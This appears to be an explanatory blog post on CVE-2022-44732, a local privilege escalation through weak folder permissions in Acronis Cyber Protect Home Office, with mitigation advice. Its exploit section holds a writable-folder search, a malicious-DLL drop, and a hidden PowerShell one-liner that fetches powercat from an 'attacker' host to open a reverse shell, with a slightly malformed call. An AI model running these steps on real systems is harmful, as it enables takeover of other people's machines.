---
Introduction
A critical vulnerability—CVE-2022-44732—was discovered in Acronis Cyber Protect Home Office (formerly known as Acronis True Image) for Windows builds before 39900. This bug allows local users to escalate privileges thanks to insecure folder permissions set during installation. This long read will walk you through what the issue is, how it works, and what you can do about it. We’ll also examine a sample exploit and provide key references.
What is Privilege Escalation?
Privilege escalation happens when a user gains rights that should be forbidden—like a standard user running actions as an administrator. Vulnerabilities like these are serious: an attacker who already has code execution as a regular user on a system can use them to take full control of the machine.
The Vulnerability: Insecure Permissions
When you install Acronis Cyber Protect Home Office on Windows (before build 39900), the installer creates certain folders with overly permissive ACLs (Access Control Lists). In plain English: standard users get more access than they should. This lets a local user tamper with files or replace them with malicious versions. When the system or a privileged process later accesses these files, the attacker code runs with elevated privileges.
More specifically
- Certain directories (for instance, within C:\Program Files\Acronis\ or its subfolders) have write permissions for non-admin users.
Attackers can drop a malicious executable or DLL into these folders.
- When a system service or scheduled task (running as SYSTEM or with admin rights) calls files in these locations, it’s *game over*—the attacker’s code runs as SYSTEM.
Relevant CVE Reference
- NIST – CVE-2022-44732
- Acronis Security Advisory
A Simple Exploit Example
Let’s see how an attacker could leverage this vulnerability. We’ll assume you have regular user access and want to escalate to SYSTEM.
Step 1: Identify World-Writable Folders
# Use PowerShell to find folders with Everyone write access
$path = "C:\Program Files\Acronis\"
Get-ChildItem -Path $path -Recurse | Where-Object {
(Get-Acl $_.FullName).AccessToString -match "Everyone Allow Modify"
} | Select-Object FullName
Step 2: Drop a Malicious DLL or EXE
Suppose you found that C:\Program Files\Acronis\SomeService\ is world-writable and loaded by a system service. You could compile a simple payload (for example, using Metasploit’s msfvenom) and save your malicious DLL or EXE into this folder.
copy evil.dll "C:\Program Files\Acronis\SomeService\evil.dll"
Step 3: Wait for Service to Load
When the vulnerable service or process starts (often at boot), it loads your malicious code as SYSTEM, granting you SYSTEM-level privileges.
If your payload opens a reverse shell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://attacker/powercat.ps1';);powercat -c attacker_ip -p 4444 -e cmd"
From NVD
> _Acronis Cyber Protect Home Office on Windows before build 39900 allows local users to gain privileges via weak folder permissions (SEC-2208…)_
Mitigation and Fix
- Upgrade Acronis Cyber Protect Home Office to build 39900 or newer. Download here
- Check folder permissions: Use tools like icacls or PowerShell to ensure no sensitive folders are world-writable.
- Restrict folder permissions manually if you cannot immediately upgrade
icacls "C:\Program Files\Acronis" /inheritance:r /grant:r "Administrators:F" "SYSTEM:F"
Final Thoughts
Vulnerabilities in folder permissions can be surprisingly powerful. It only takes one misconfigured directory for an attacker to escalate from a basic user to SYSTEM. Keep software updated, review permissions on sensitive application folders, and monitor advisories from trusted sources.
More References
- NVD – CVE-2022-44732
- Acronis Security Bulletin SEC-2208
- Metasploit’s guide on msfvenom
Timeline
Published on: 11/07/2022 19:15:00 UTC
Last modified on: 07/06/2023 14:47:00 UTC